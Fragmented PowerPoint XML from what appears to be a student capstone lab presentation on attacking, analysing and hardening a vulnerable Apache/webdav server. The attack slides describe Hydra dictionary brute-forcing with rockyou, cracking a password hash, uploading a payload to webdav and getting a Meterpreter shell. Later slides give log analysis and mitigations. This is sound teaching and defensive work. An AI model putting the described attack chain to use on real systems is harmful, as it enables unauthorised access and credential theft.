                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="404778" y="3154200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181237" y="3154200"/>
                    <a:pt x="20" y="2972983"/>
                    <a:pt x="20" y="2749442"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="20"/>
                  </a:ln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0" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F3F3F3"/>
            </a:solidFill>
            <a:ln w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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2E587A-217E-4DAB-8F26-645342616209}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1026436"/>
              <a:ext cx="1678290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Tools</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1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Processes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5DAB1F0-3577-4A2D-BA1A-44CD154E212F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1235987"/>
              <a:ext cx="2540136" cy="2375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Executing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Hydra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brute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force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2709744-4112-45BA-A7F7-E9F7FE0FD128}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1445536"/>
              <a:ext cx="2662562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dictionary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attack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bash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tool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to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33310C7-3D58-47BA-BC5F-A7589BE55029}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1655086"/>
              <a:ext cx="2388117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get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password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for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Ashton’s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2F2B2E-B3C1-4D63-9CD7-6B0498F22B44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1864636"/>
              <a:ext cx="780364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account.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904AF1D-7D31-4ABD-86DF-3C61C7A63E91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671496" y="2282917"/>
              <a:ext cx="2563040" cy="19794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E8B405-264D-4D4F-AB85-A4F2F8E0CF2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2455187"/>
              <a:ext cx="50065" cy="2375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9479F3-0BE7-4E7D-A6C9-9EDD40E57395}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301687" y="332802"/>
              <a:ext cx="393020" cy="41567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3" name="Shape 338">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC5780C-906F-4F32-8825-EF369F7F7217}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318969" y="636608"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144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 w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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Shape 339">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{919EC799-87FE-42F4-89A5-271331165EFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2954582" y="247823"/>
              <a:ext cx="533372" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533372" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533372" y="58367"/>
                    <a:pt x="533372" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533372" y="397165"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533372" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:ln w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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CFF6C8D-78BD-4E93-AF8F-23F85F6596FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3073463" y="332802"/>
              <a:ext cx="393020" cy="41567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02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6" name="Shape 341">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622CBAAC-ABF2-4474-9D76-C17B33BBE5B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3090745" y="636608"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144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 w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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26A8E32-30AF-42D3-BC4E-35935E759CB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1026437"/>
              <a:ext cx="1298445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Achievements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1AE0FF1-F405-4FE2-B6F0-4367D05D7C5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3421331" y="1404638"/>
              <a:ext cx="2336194" cy="688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Password</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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for</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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Ashton</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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was</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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EC29D50-BA5E-4313-85D7-EBED80FDCA1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1243289"/>
              <a:ext cx="2557771" cy="4397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found</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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in</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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‘rockyou’</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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dictionary.</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-AU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E9BE87E-5687-4E2D-9BDB-C27C812F5B6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1864638"/>
              <a:ext cx="2665805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Access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to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the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/secret_folder/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DBDB264-BEF4-4F4C-BB24-016A0A71EE5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2074188"/>
              <a:ext cx="1270879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was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achieved.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F35A0BB-D6F7-4575-A948-EAA9A480870F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2493288"/>
              <a:ext cx="2322445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Access</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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info</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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for</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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/webdav/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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03CE2F3-A123-4AFD-A24F-D6FD69981222}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2702838"/>
              <a:ext cx="1698964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system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was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found.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0FABB5E-4CA9-4778-B9DA-52190AE48BD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="3121938"/>
              <a:ext cx="2372712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Hash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for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Ryan’s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password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E9145F0-8152-47A7-A62F-ABA3942E77C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5188662" y="3121938"/>
              <a:ext cx="416735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was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CDBC608-F29A-42A4-A43A-2674D4EA377D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="3331487"/>
              <a:ext cx="2518651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found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and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cracked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allowing</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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8C0C5D0-F103-480E-96E0-2F32C7A7CC93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="3541037"/>
              <a:ext cx="1654777" cy="2375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access</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="2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to</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25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webdav.</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-AU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8" name="Shape 355">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95EBC92-8D63-4091-A0A5-EB7A94478750}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5859707" y="248573"/>
              <a:ext cx="533371" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533371" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533371" y="58367"/>
                    <a:pt x="533371" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533371" y="397164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533371" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397164"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:ln w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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3D3341-D029-4540-A595-FFB0C712DD6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5978588" y="333552"/>
              <a:ext cx="393020" cy="41567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</a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-AU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0" name="Shape 357">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D90E86-D0C9-4F91-AB5C-34E92D967404}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5995870" y="637358"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144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 w="0" cap="flat">
              <a:noFill/>
              <a:miter lim="127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62C2E94-C9F8-4103-8250-CD9A2E3B5103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887665" y="778256"/>
              <a:ext cx="2429256" cy="28346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8066421-DEF7-4ABC-8D12-A390EFE67A8E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065465" y="2441448"/>
              <a:ext cx="1837944" cy="173736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B5672D9-6779-40F6-9413-7C49573CF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846" y="826722"/>
            <a:ext cx="621846" cy="5669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7CEE4-624E-474D-9300-2FA460722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D31B4-E56A-4EC0-85D8-51B1B5D66B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BB614C1-5FB5-40DC-A6DE-EF93C573F24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2D393D-6B80-45F1-9A77-17AD522CE5E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26986-CC7A-4D01-A4A1-239C280CE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99" y="-1"/>
            <a:ext cx="9144000" cy="517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0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1904-DB57-411F-B6A9-C2CEDE7A5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518EE-5413-4B76-B527-3547596B4F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8AC8BC8-A71E-42AA-A3B3-98E37C4DE37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48F679-F5B6-4429-85C5-7C516D8E4CE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505AA3-E9D2-47AC-A383-8A1ECDAA6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00" y="-1"/>
            <a:ext cx="9156300" cy="518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38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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force Attack Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]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US" dirty="0"/>
              <a:t>Capstone Engagement - Assessment, Analysis, and Hardening of a Vulnerable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A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Hydra was used to cracked  the credentials on a target user.	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kumimoji="0" sz="2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kumimoji="0" sz="2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Password was obtained from the brute force attack, then use to carry out further attacks.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kumimoji="0" sz="2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AU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AU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AU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AU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A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AU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16D989-7C9E-4B65-BFE7-DA368880F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809" y="2230134"/>
            <a:ext cx="2352566" cy="7658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AD1533-A486-42B8-B2C1-E48ED77F2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992" y="1636939"/>
            <a:ext cx="2332200" cy="42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88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Open ports Vulnerability</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133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4" name="Google Shape;1134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I used port 4444 as my listening port and uploaded the payload to their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>webdav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, simply by clicking on it in their directory their system opened a Meterpreter session for me.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6" name="Google Shape;1136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7" name="Google Shape;113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8" name="Google Shape;113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9" name="Google Shape;1139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0" name="Google Shape;1140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1" name="Google Shape;1141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2" name="Google Shape;1142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I was able to gain access to all the files on the remote server through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>Meterpreter.I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 opened a shell using terminal commands as their system is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>linux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en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>based.I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 browsed their system and found the flag I was looking for.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4" name="Google Shape;1144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5" name="Google Shape;1145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6" name="Google Shape;1146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7" name="Google Shape;1147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984AA2-7334-44F7-8A00-F562B13DDD4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31272" y="2453667"/>
            <a:ext cx="2209819" cy="13076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5" name="Google Shape;1155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16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62" name="Google Shape;1162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Google Shape;1164;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1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165" name="Google Shape;11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0AFCAE-8763-4B6E-8663-17845EE7E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0" y="1469974"/>
            <a:ext cx="5218942" cy="3159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076705-6A4E-4BAA-8B02-4F3383F8F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292" y="1443137"/>
            <a:ext cx="3190358" cy="31861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72" name="Google Shape;1172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3" name="Google Shape;1173;p6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66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175" name="Google Shape;117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155844-2726-4B7A-86A5-E3534E7F5ED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67349" y="1420534"/>
            <a:ext cx="5461951" cy="1589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DD812D-4E43-4B83-953A-94966238495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67347" y="3010325"/>
            <a:ext cx="5461951" cy="1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E7C389-C636-4A00-A496-892036E5A52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829298" y="2561200"/>
            <a:ext cx="3086971" cy="23088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2DA9CE-E150-4D2D-8FF2-AF494A5F2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9298" y="1260200"/>
            <a:ext cx="2947352" cy="130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D1B4AD-7DFB-4CAB-9880-A06075A58E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5165" y="1453687"/>
            <a:ext cx="2847975" cy="1571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55503F-8BAA-4AE4-8CBB-44826ABCD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505" y="3010325"/>
            <a:ext cx="2834470" cy="1621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253633-BB19-4886-9E62-32BA0CC44E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1969" y="3392956"/>
            <a:ext cx="1813481" cy="14771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82" name="Google Shape;1182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3" name="Google Shape;1183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4" name="Google Shape;1184;p67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185" name="Google Shape;118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FA0DD7-2316-4895-8367-B10DB05A366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64249" y="1467800"/>
            <a:ext cx="8482736" cy="24918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6F5F61-D666-49A8-8B22-D055EE3CBBC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293915" y="3913397"/>
            <a:ext cx="8482735" cy="73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is evidence of large amount of data being requested for sensitive data. Which is a signature of a brute-force attack. Possible infection which could resolve in a malware removal of logs.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password protected secret_folder was requested 16,059 times which has evidence it was successful at times.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Execute Summary</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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1516956"/>
            <a:ext cx="9144000" cy="177355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Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The presentation is to identify the attacks carried out on the target machine, providing an analysis of the attacks based on the logs collected, and providing the administrative &amp; technical mitigation recommendations to harden the security on the system.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"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Capstone Engagement - Assessment, Analysis, and Hardening of a Vulnerable System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5094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92" name="Google Shape;1192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4" name="Google Shape;1194;p68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195" name="Google Shape;119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2D85B2-92E2-44E8-9094-265A9EB41BC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67350" y="1421546"/>
            <a:ext cx="8409300" cy="24380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D5590-B008-4A77-A06A-C5BE8A3B25D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3859584"/>
            <a:ext cx="8409300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Secret_folder was requested 16,059 times.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shell.php was requested 190 times.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2" name="Google Shape;1202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21</a:t>
            </a:fld>
            <a:endParaRPr sz="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Mitigation: Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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port scans?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1C1D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AU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up an alert for Port 22 and Port 80 traffic certain level of traffic in within a specific period.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Set alert when user attempting to browse directory structure will trigger alert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threshold would you set to activate this alarm?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alarm fires when the level set for port 22 and 80 has a high level of traffic then normal.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If user made 10 attempts to open directory on the apache server within 60 seconds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" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1210" name="Google Shape;1210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configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1C1D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AU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Disable Port 22</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU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AU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Use whitelist access for Port 80  on the server to mitigate the vulnerability.</a:t>
            </a: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- Remove company related information on outward facing apache server.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- Set up policy to prohibit storing sensitive data on the apache system.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Login as system admin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5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Command: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rm –r /company_folder/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unauthorized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sz="1400" dirty="0"/>
              <a:t>Only allow authorized IP addresses.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sz="1400" dirty="0"/>
              <a:t>Have an alarm notify by email that an authorized IP is trying to gain access.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Whitelist with IP address.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- Have an alarm that fires when incoming IP address is detected that is not authorized.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18" name="Google Shape;1218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unwanted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dirty="0"/>
              <a:t>Encrypted file.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dirty="0"/>
              <a:t>Restrict sensitive data to specific users only unless giving a decryption key by the users in charge.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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Don’t save password and hash on the webdav server as party of policy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Command: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sudo nano /ect/pam.d/common-password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5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Add the following configuration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password     [success=1 default=ignore]    pam_unix.so obscure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C0C0C0"/>
                </a:highlight>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sha512  minlen=10</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US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C0C0C0"/>
              </a:highlight>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Roboto"/>
              <a:ea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AU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brute force attacks?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AU" sz="14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 Alert if encounter a threshold of login     10 failures from a specific email address within 1 minute.</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D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AU" sz="14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Stronger password policy, Password make up at least 10 character long with upper case letter, lower case letter, numbers and special characters.</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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sp>
        <p:nvSpPr>
          <p:cNvPr id="1226" name="Google Shape;1226;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45720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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr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sz="1400" dirty="0"/>
              <a:t>Increase password length.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sz="1400" dirty="0"/>
              <a:t>Increase password complexity.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sz="1400" dirty="0"/>
              <a:t>Limit login attempts.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sz="1400" dirty="0"/>
              <a:t>Implement captcha.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sz="1400" dirty="0"/>
              <a:t>Use multi-factor authentication.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line(s).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C291D-DA8F-4F00-8F78-1B6412BCC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283" y="3866780"/>
            <a:ext cx="2817267" cy="12766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access to this directory?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1800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Trigger alarm when files are being added to the /webdav directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>larm fires when unauthorized IP addresses are trying to add files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482168" y="1351127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control access?</a:t>
            </a:r>
            <a:endParaRPr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dirty="0"/>
              <a:t>Administrators should install and config filebeat on the host, so it limits logins to a specified IP address or range.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Upload of file to /webdav directory is not permitted.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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1C1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 read only.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The apache server already set access for authorised users only, the key issues to ensure credentials are not compromised.</a:t>
            </a:r>
